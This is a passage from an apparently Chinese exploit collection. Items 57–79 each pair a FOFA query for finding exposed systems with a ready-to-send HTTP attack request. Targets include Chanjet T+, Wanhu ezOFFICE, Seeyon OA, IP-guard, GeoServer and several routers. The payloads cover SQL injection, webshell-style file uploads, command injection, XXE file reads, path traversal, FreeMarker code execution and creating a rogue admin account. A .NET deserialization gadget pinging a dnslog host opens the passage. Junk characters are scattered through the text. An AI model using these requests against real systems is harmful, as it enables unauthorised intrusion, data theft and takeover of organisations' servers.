"MethodName":"Start",. ]& N" J! T" H# x" C$ E/ f) g
"ObjectInstance":{5 X2 D# i0 C' R) D
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
0 n7 d% B0 T2 h c' ] "StartInfo": {1 P6 ?5 w; H& h8 a( X% q( C
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
, o+ R' w( d/ ?2 O0 \ "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
& ], V& F. g+ {$ \9 w }5 P% K9 W1 T" q! R) r; S
}
! ^. }8 |" m) A& z }& c0 z/ x& K- I3 D
}
0 t' H% ?7 u" L* n& P' A/ W$ M% Y# A3 T# Y" C$ E t# D) r
7 B7 G" n7 c( l H" s
57. 畅捷通T+ keyEdit.aspx SQL注入
L( S0 t4 o [; Q( j6 PFOFA:app="畅捷通-TPlus": ]" a" D* `. E* S& S! ^
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
1 ~$ p% d# B; u7 }2 P8 C: {Host: host" G- T; O6 J1 X' j: |: k4 h
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
! Q2 J, g3 m2 X3 D q4 [* DAccept-Charset: utf-89 Y- C! }! h3 q
Accept-Encoding: gzip, deflate
7 y$ K( \: z6 Y! U0 Q' ?# B, @Connection: close& ^; N$ B& `; }
. [$ d) N6 R1 u, @# J; G" \: |; Z: s8 A6 c2 H; {
58. 畅捷通T+ KeyInfoList.aspx sql注入 F8 M* S4 s7 m! ?
FOFA:app="畅捷通-TPlus"% l, [8 Q1 Y- r* c. q
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.18 m, E, F4 ?1 o* U
Host: your-ip2 r8 v- O$ J" I- ]4 S1 z
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36: E+ I! P/ `. h% K/ C
Accept-Charset: utf-8) k+ w5 ~, `" e, ]
Accept-Encoding: gzip, deflate
8 L) u0 G. i0 |$ xConnection: close
' C9 R4 y' N+ r: m3 K, ?7 t1 ~7 Y9 _' X% Z$ a' R0 b5 c* G0 O
" O+ `1 y1 }* i* y1 t. V/ O1 r3 e/ x
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行9 x( M! z1 I/ c3 q& Z" H. }& n
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
' E% S+ a, d6 }$ q6 G N. ^POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
; q: b7 @/ I" F5 ?/ `' d! bHost: 192.168.86.128:90906 r5 ?' q% T: t
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
( I0 K3 y6 N$ N4 E" V( jConnection: close2 A9 ?+ _+ X) ?, ?0 R
Content-Length: 1669
3 H: G1 S# _- P; U2 vAccept: */*
: J3 G. {" p0 mAccept-Language: en6 S( N% S8 B- c' ^' H0 D
Content-Type: application/x-www-form-urlencoded
I }7 c: y) u2 HAccept-Encoding: gzip7 L/ L- L" A9 j3 Y
. V1 {7 p" o- j. u# JPAYLOAD7 g1 q+ ?9 V+ H0 {+ \ u
" `' g4 z3 K# p- b9 y
$ T8 }9 A" F5 \7 s+ m60. 百卓Smart管理平台 importexport.php SQL注入! i& V; R2 w+ B
FOFA:title="Smart管理平台"% S6 K' A, {7 H- `" X2 L
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.18 q7 _$ \4 d! V% M7 x9 i' b2 r& w
Host:
1 E$ \( G9 t+ ^) I1 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.364 t& q& T" v( g+ o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% z! C2 y7 w8 @! CAccept-Encoding: gzip, deflate7 Q/ F1 v9 H* `& y, z( L0 E. S
Accept-Language: zh-CN,zh;q=0.9
0 n6 F" l) p, [Connection: close
$ n1 `$ C+ `4 [4 V6 w; G c0 p' D8 [0 i: J- d5 p
- H# t5 L# N' L, F
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传, r/ }/ {/ P+ q3 N( }" j8 E
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
- C$ [( i: k0 p5 F, K! vPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
+ L- Z d; E5 m% V7 D7 s7 Z4 CHost: x.x.x.x* [% k7 ]+ c) x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 l% s) y* G" L/ E: M- Z
Connection: close' r! |2 I1 T: H# a9 l
Content-Length: 272 j4 E* }: P \9 g( P \/ B& P% y; l
Accept: */*
i' m- d+ S7 n FAccept-Encoding: gzip, deflate8 ]5 C, L; R/ ~/ y" @! L
Accept-Language: en
! u v) c% o/ SContent-Type: application/x-www-form-urlencoded
' a( E6 y: t" |. L
- y7 I8 Z% Y( C+ J7 V8 p8uxssX66eqrqtKObcVa0kid98xa
7 K; m- h" G: O0 B, z$ K
' t0 } F- g" t' X% v% H! k) o* S! X; x% d) D( D8 D/ t. G' R
62. IP-guard WebServer 远程命令执行3 N4 F1 k2 f) p; K7 C' a- [
FOFA:"IP-guard" && icon_hash="2030860561"
/ A$ I' d9 B7 V7 eGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1- v, W9 c' G+ B3 Z. d* ^, c
Host: x.x.x.x
, C G; O; n8 R; J5 l9 FUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.367 W q1 C9 z" U
Connection: close( n, k$ V) _2 r: Q8 [: Z
Accept: */*7 W% S$ j3 a8 j- K% \% `0 ~
Accept-Language: en6 E/ v0 u/ n6 Z6 E% J6 ]
Accept-Encoding: gzip
% E; ~4 i) r4 e* V5 D9 d% |" [5 h5 M. [9 E+ m
' l6 f. N: z5 J9 C3 u- s4 l& g' [" r9 f$ v. Y
访问
# _. y$ q3 e5 g& f3 w
3 {* `* Y" K* ?" e! Z. BGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
4 ~( k* j" O P4 RHost: x.x.x.x9 _) \6 S* `* U+ O
( e+ t8 l1 a* r( b8 g
- V8 S. R/ i3 b0 l' ]3 ^. ~63. IP-guard WebServer任意文件读取0 f7 o" ~* @) Q& s
IP-guard < 4.82.0609.0
( G+ R, W8 ]! ^) RFOFA:icon_hash="2030860561"- `1 Z. d- b4 T. N2 J
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
# e) m; M o# f8 `+ J3 THost: your-ip N7 \& N, j q$ Z5 J/ t+ E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 H8 v" f$ {. r2 t1 o4 T" s& l6 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& o- q! b8 P1 G- ~Accept-Encoding: gzip, deflate7 E1 H) x& I g$ _0 @$ J
Accept-Language: zh-CN,zh;q=0.9
, M% N0 ^/ j5 E! \Connection: close
6 B" @! d }, u. r3 @& C4 XContent-Type: application/x-www-form-urlencoded
- O, K5 D! O; F& P1 ^, \. d. B
+ a0 r- b/ R4 x2 W9 ]. U$ Ypath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
7 V: Z o, H/ M$ _/ K1 U% {' {! P ?- y
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
7 @! d0 k& c( B3 V. GFOFA:body="/Scripts/EnjoyMsg.js"
$ K5 R; i. i OPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1* [; [4 K* ]5 @/ B6 J) J
Host: 192.168.86.128:9001
+ E( O6 y: T# G8 jUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
* V- H+ j( D" P4 m! c5 UConnection: close
3 h0 t3 B. D& q% o( |* XContent-Length: 369, c T. R2 o6 }7 g! e/ t7 M
Accept: */*
- a# o7 h. W$ m) a" t! s5 R0 }8 m$ ZAccept-Language: en
: N$ K$ v0 j9 n7 ?6 ]Content-Type: text/xml; charset=utf-8- N9 y3 H% E; }% a+ q' ^4 O" ~
Accept-Encoding: gzip. o0 E/ Q, v+ @" W0 c
2 o O& [5 y& I' @( X; Z$ J* [' M<?xml version="1.0" encoding="utf-8"?>! f' m: y, J! \7 f! M* B1 V6 R
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
/ V0 G' D% @5 {- n<soap:Body>3 Z. a/ s3 }2 S% Y
<GetOSpById xmlns="http://tempuri.org/">3 E4 v% J/ O q
<sId>1';waitfor delay '0:0:5'--+</sId>
; O: m. \9 r. h! H: T. k3 T </GetOSpById>
* _) @$ o- X/ ?4 a </soap:Body>* C- E5 q9 W" x5 ]0 z
</soap:Envelope>- U# L3 G1 i7 T7 p a
+ e3 C6 r4 C0 S& a6 V
/ X- e1 O" B. b! g" g65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过# f2 z8 c! a& R3 n3 T
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台") e; H, T. g. {3 y5 r
响应200即成功创建账号test123456/123456; Z+ _. h9 r9 s+ w7 @! M
POST /SystemMng.ashx HTTP/1.1
# n/ `, y" |3 m$ h" rHost:
) z* M& M6 E0 f& l2 Z( P' pUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)4 S! |. }- ~0 R0 r4 g
Accept-Encoding: gzip, deflate* h r! f* f E; R' k& Q
Accept: */*
. V5 R- U n/ R% B# N' FConnection: close
! |& C j" l0 V" q- C& \4 L% s; N% ~Accept-Language: en
' Z; K ?7 [$ S# C$ d2 c- V. QContent-Length: 174# X8 X7 H. Q9 ?& A
) [" p* E5 P& n! U+ J) C+ zoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators s- ]0 u, D4 ? e
+ n3 {! A4 A: v4 a8 R
. q- S: U d+ W; R- }9 C- }. s* o66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
! p& D% K5 X7 i* L8 EFOFA:app="万户ezOFFICE协同管理平台"
& W/ M0 |0 b& N+ V
& ~8 P$ g, _& \# k6 b4 N! eGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.18 g5 |( n; j u5 u4 o
Host: x.x.x.x
1 o7 v% k, w8 ?" bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
+ J8 B1 D& }6 ^6 h; q- dConnection: close
$ Y8 ]/ g6 e/ C) C1 kAccept: */*- _6 I C& r6 Y2 n
Accept-Language: en8 @' d, Y5 t0 @3 k: _4 m: J" A$ U
Accept-Encoding: gzip8 @+ i% J3 l. {5 t C
# {3 J8 E1 g) w8 j! J6 g5 E; Y0 n ?2 _( H
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在) r! y2 b5 I' q' k- ~: c
4 w1 l x R1 R$ h" M. s
67. 万户ezOFFICE wpsservlet任意文件上传
" d! g; a1 _& Y( m0 w3 AFOFA:app="万户网络-ezOFFICE"
* i7 H7 Q( ^* C7 {3 R. U# AnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型- f( b8 H+ G9 J6 u N
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1" r3 j8 Q/ Y/ V# U- P/ X3 R0 H
Host: x.x.x.x. v j* c8 u- l1 T# Q1 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
- a5 D9 }/ X: S0 fContent-Length: 173& R' [( R$ {* d) o! `! w* p2 L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.86 q6 d: j. s$ w( D. u7 B7 \4 N5 F. Q8 J
Accept-Encoding: gzip, deflate- B5 I" u9 M$ j3 ` ]
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 ~1 d+ L- r0 {6 T* \' D
Connection: close
# s) G/ n* K; D! Z; ^Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp; n5 \' F) E- z5 C9 `
DNT: 1
' i* h* e% g! t$ ?/ J& |' ~+ W( p! kUpgrade-Insecure-Requests: 1
- w8 P) |0 Z8 M9 d2 m$ Q* O% E }! H7 t" Q1 T! V2 X
--ufuadpxathqvxfqnuyuqaozvseiueerp' a3 R8 z0 c* K6 w- ^ i( j8 }
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
0 l4 k6 ^; j" d$ q8 {
9 U3 p' { c0 ~$ E<% out.print("sasdfghjkj");%>
/ {1 y S$ m" G' s--ufuadpxathqvxfqnuyuqaozvseiueerp--0 H+ K9 S. }$ I; @' m# m% {
7 `% W" J5 \4 }7 v; U
/ x; d% [- y4 L: ^0 e
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
R5 ^! L3 U; k2 D; y% y
$ H, L) T5 r1 E& D1 c9 g) n; V68. 万户ezOFFICE wf_printnum.jsp SQL注入0 J! ` v1 J, }0 [
FOFA:app="万户ezOFFICE协同管理平台"
, h$ k$ h! ?9 `; d% ^GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
2 S- ]3 `" W/ L+ P! g. \( ]- cHost: {{host}}
2 |/ Y, N+ H6 `' B' { @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
; T$ k1 e- M, p+ ?: b- S9 RAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8. W' O9 @3 r0 o! F
Accept-Encoding: gzip, deflate
$ i* P& E- ?* I S( AAccept-Language: zh-CN,zh;q=0.9! q* f h; Z. c5 f! i3 S
Connection: close
5 e1 G* k2 e2 J6 f& E
{2 g, e: A( | l6 n g9 G) q1 X2 {8 h5 |" b4 \- M4 |+ B
69. 万户 ezOFFICE contract_gd.jsp SQL注入
9 _2 b5 N& l" GFOFA:app="万户ezOFFICE协同管理平台"
3 q# T& L3 v- @4 |GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
8 U9 r. u' u0 y0 p1 ^Host: your-ip" ^: A* C, M3 B3 j) B1 M; a( m$ X: ?
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36: G3 q2 @' F0 d, f# n
Accept-Encoding: gzip, deflate
t& `7 D; |% `7 a2 w0 KAccept: */*
& _1 E" o/ N: zConnection: keep-alive
' }" N* B- Z* K/ r( z; r4 B$ W' c- B/ f. o5 N
8 c& p4 o) F2 E! J1 u5 \( u70. 万户ezEIP success 命令执行$ C+ L: K* c, e1 @, \& ]
FOFA:app="万户网络-ezEIP"& S, V5 ~3 e5 I1 X% H
POST /member/success.aspx HTTP/1.1
1 s/ p, {9 N: w8 F% b$ ]1 C7 z. }* CHost: {{Hostname}}
' G5 r; T8 q" L) B4 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
4 p+ ~, L6 _3 Q: L" f1 `" NSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=6 r0 F: z# ~7 h& @! ]% _' B
Content-Type: application/x-www-form-urlencoded
7 Q7 G: F: T; ? G. a9 p; zTYPE: C
/ R* {7 a/ k; n& u5 hContent-Length: 16702
5 s6 o6 _- H0 c* Q% M* \: Q2 u" |5 T3 T3 `
__VIEWSTATE=PAYLOAD
) H+ B& T" A" Q
: [% K/ B6 A3 h6 {9 A q$ j. Q! W
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入( o5 v# I4 E( q! @4 V
FOFA:body="PM2项目管理系统BS版增强工具.zip"
g1 i/ x0 h0 IGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
1 }1 F. @* m* q" b+ VHost: x.x.x.xx.x.x.x, o3 i9 a2 e- d( D8 T# J% ~7 V
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
1 @7 q% p8 B- p4 K4 K9 b! yConnection: close
l, e9 I4 w: W( r+ w6 f/ CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" t+ i+ d* U" h
Accept-Encoding: gzip, deflate1 G) l, N. q4 t/ c9 \4 a
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% W) W2 p6 J. y8 @, T
Upgrade-Insecure-Requests: 13 A& F( i$ F- s- E. w$ ]8 U6 K% O
# h6 o, E& Z3 w5 N6 R5 S P+ }% M& N
72. 致远OA getAjaxDataServlet XXE
3 X r5 [6 p! F6 G- g: S5 ] wFOFA:app="致远互联-OA"' Y6 Q; ^1 t; c# U+ ^% r
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1, R/ c2 N5 ]0 u
Host: 192.168.40.131:8099/ S* j' P! |6 |& @" G1 p6 }
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.363 _' ]% b6 S; b
Connection: close8 P& ~" E- f% k5 T
Content-Length: 583
) l2 f) s7 V+ g& L. l* FContent-Type: application/x-www-form-urlencoded
1 q; p, c6 J3 X" }Accept-Encoding: gzip
/ s8 D5 Y3 B1 J, }% Q+ Z; c5 J4 R% H8 R9 N4 y# {# a
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E7 d3 I0 T1 y- v/ G
' j; Z( Y& I0 n) F7 I: e+ k8 N0 o" `5 ~4 r( Z. W1 P& D0 G
73. GeoServer wms远程代码执行
8 v& b% f& V: I" g) A# FFOFA:icon_hash=”97540678”5 [8 u S( i- ]8 X4 a9 O
POST /geoserver/wms HTTP/1.1
9 \' l' q" v3 T# T$ B" p# `Host:5 b6 ^, {7 T/ H# e4 C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
0 G; x# u5 ]* Q; @6 l9 L3 cContent-Length: 1981: n. r3 c8 t4 S& z: I
Accept-Encoding: gzip, deflate% ~8 J: `/ s: f# x/ q( \ Q
Connection: close, N5 O! r g0 D+ ]+ k
Content-Type: application/xml g1 C) A9 I: K" l
SL-CE-SUID: 3$ Y* u# _% s% X5 r! P9 C8 M7 D5 A6 E
: a2 X; T/ M TPAYLOAD$ I( n5 b& l/ R0 k3 `
8 a" O( E$ c; |# U& G% T
- O7 j$ ]9 @$ ]2 f* S6 P: }74. 致远M3-server 6_1sp1 反序列化RCE
0 x4 u3 b" M1 S( G6 ]! AFOFA:title="M3-Server") G; s" d9 Q; c! q/ W( @
PAYLOAD6 \. A2 _9 ~& Y# C& G4 b4 J; v
2 x6 _$ O' t' t- I5 `
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
; k6 q& E E1 PFOFA:app="TELESQUARE-TLR-2005KSH"1 G3 V, M& J3 q' G# ~6 b& K3 a
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
8 o- k3 F7 c8 D5 W' Q5 W& ~3 ^! IHost: x.x.x.x
4 V8 L5 s7 L% u5 J- X/ I. g- a. KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# D% n) d$ t9 R% s1 t( T( G
Connection: close
! i4 U9 K0 n' ]" i4 j3 XAccept: */*
$ n, R- e4 R! n: k: j/ bAccept-Language: en1 c( s; E4 d, T4 }, Z. _& K* j4 ^
Accept-Encoding: gzip, H* X1 N$ v. }0 f1 }. {
/ Q1 H$ a2 g3 A4 L$ M7 ~3 n$ f- Q+ i
GET /cgi-bin/test28256.txt HTTP/1.1- U$ i1 R: D7 O% a9 [
Host: x.x.x.x4 j) s- J! V$ c8 x4 d
( n1 U( T' `; P3 e( v2 F7 V
5 Q* `0 E: X% a1 @- a" _8 l3 h76. 新开普掌上校园服务管理平台service.action远程命令执行
6 C7 L: X0 {- x/ x# |3 j' yFOFA:title="掌上校园服务管理平台"
2 [# I, v; d. j" a; dPOST /service_transport/service.action HTTP/1.1
3 z ~4 [0 u, E; k% m" }Host: x.x.x.x
1 n7 {! O: e% zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.07 d& u* T& `+ Q5 s1 ]
Connection: close
& O) f2 O5 h0 K1 d3 A4 S' \7 MContent-Length: 211
# B. r y2 _- O0 T) N# }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 l. Y9 l' `( r4 ]6 w3 N
Accept-Encoding: gzip, deflate
6 W0 |/ g9 v9 a% eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 l9 |9 [; B- d9 u! k9 P
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
( Z& ]' z0 ~" S# }8 {Upgrade-Insecure-Requests: 11 H. F& ^5 \" [* K1 k
# K& B7 b: a. V2 d/ D4 g
{
) H4 s% B( f! _, e* a5 N"command": "GetFZinfo",
' G2 F& B- _' V% m% d "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"3 x+ H' @6 h5 I' i
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
# k. P9 ]7 I; @1 Z( |}/ E3 f3 k2 O) r* G
9 i' F# q1 W# [1 k+ E( i
4 V0 L" o% p4 x) e, q+ B
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
' U3 b+ d4 W1 n9 R+ XHost: x.x.x.x
) k. s2 z9 V" U% h4 U+ m( i* ^# G6 r* f+ P6 I+ o3 u( R0 G
) v& M& N& Q9 A) f% {" @+ i0 U
! O( ^$ s p8 I, v' y' K0 Y, a8 F
77. F22服装管理软件系统UploadHandler.ashx任意文件上传) @- x* ?# B2 D+ m% x
FOFA:body="F22WEB登陆"
; N3 e: h; z4 O0 I) T& x/ S+ RPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1! ^, s4 j3 f( c2 B) g' }9 n
Host: x.x.x.x1 \9 m* [$ F/ E) G2 t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
4 u5 N* N3 c. U' qConnection: close
: E9 Y! i U" X: dContent-Length: 433
( {- H" i* v& o7 C" R' c3 dAccept: */*
) b+ p9 }% f: d1 n) L: MAccept-Encoding: gzip, deflate
: n! q# ~8 h7 q1 a5 d! wAccept-Language: zh-CN,zh;q=0.93 G0 t. h8 P' D* Y6 L; o% c& X4 d
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
8 x& k$ W' ^# R0 X% z3 u3 _; {! q# W
------------398jnjVTTlDVXHlE7yYnfwBoix7 E" f: u1 C' j6 V
Content-Disposition: form-data; name="folder"6 v, U3 {$ @* \1 O: Y( c: x1 O. ]
3 e' l7 F- x3 q+ `, J/upload/udplog
; v& d. P! u8 U------------398jnjVTTlDVXHlE7yYnfwBoix9 E: h/ q8 u) T7 d* ^ j0 s
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
/ e) e. |( x3 y T. B% rContent-Type: application/octet-stream
3 K1 t7 m; o' O
. F- s6 s3 T- q0 ?hello1234567. q* x5 a+ ]7 c* V$ @8 q! H r
------------398jnjVTTlDVXHlE7yYnfwBoix: D9 h# ^: h1 O/ B8 E: H0 h
Content-Disposition: form-data; name="Upload"
8 k6 ]8 e$ @ @3 s# v( L
: p' p' w/ s# t) D, K' q7 \4 r7 USubmit Query
1 x2 {/ L- N$ b* x+ w6 O1 }2 O7 I------------398jnjVTTlDVXHlE7yYnfwBoix--
; e4 M4 j% u! R+ k, W3 O7 ]/ }4 J/ M6 U, p3 \( |0 x' ^1 d
* p8 | m5 O( J: O3 e78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传6 Y& b! l8 K7 n k
FOFA:icon_hash="2001627082"
* f% k( d" h. J" rPOST /Platform/System/FileUpload.ashx HTTP/1.1
" r$ @& d6 n' G) S& hHost: x.x.x.x
q& i( [, c3 |( D' N0 FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% y- \% v, b- c7 T* [) ]( mConnection: close7 g# H+ H1 K: ?. q7 A6 i- n
Content-Length: 3360 O7 ~. ^" _; H7 k
Accept-Encoding: gzip2 O) A4 o. |% a" `+ O& M; B1 w
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l# W3 y0 L, H* T, l
. g& O& m% I% j------YsOxWxSvj1KyZow1PTsh98fdu6l
! V7 e8 D) i5 T% c# \$ f9 e8 WContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"5 ?$ W1 s: ]- @' Y& C4 `
Content-Type: image/png
. s' q" u; P: p! w' E* m: Y7 X$ W4 v( H) ]- C% M" I
YsOxWxSvj1KyZow1PTsh98fdu6l9 i% p) p1 r2 w% H
------YsOxWxSvj1KyZow1PTsh98fdu6l( {5 M+ c; ^9 j3 L6 x) n
Content-Disposition: form-data; name="target"
, Q* v" h9 r5 b, _1 N# O' y- @) m' z) s
/Applications/SkillDevelopAndEHS/, p ` M& H. J
------YsOxWxSvj1KyZow1PTsh98fdu6l--
[# z$ h" H+ s" P$ g; {. ~5 S! ^$ E& g8 @, r+ z( i) B
/ | s% _$ d v9 Q: ]
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1$ P- M5 J F% |4 @# B
Host: x.x.x.x
+ h* S/ W V$ C5 c V
% D& D1 F$ N& J" X; H- t7 l& V. g- E' {" f
79. BYTEVALUE 百为流控路由器远程命令执行
# a( g5 x4 o: b. D: p5 |FOFA:BYTEVALUE 智能流控路由器
+ o% `: [& h( @8 p$ R4 v* DGET /goform/webRead/open/?path=|id HTTP/1.1
2 z& L, F& v2 jHost:IP. c5 Z- l. {; W
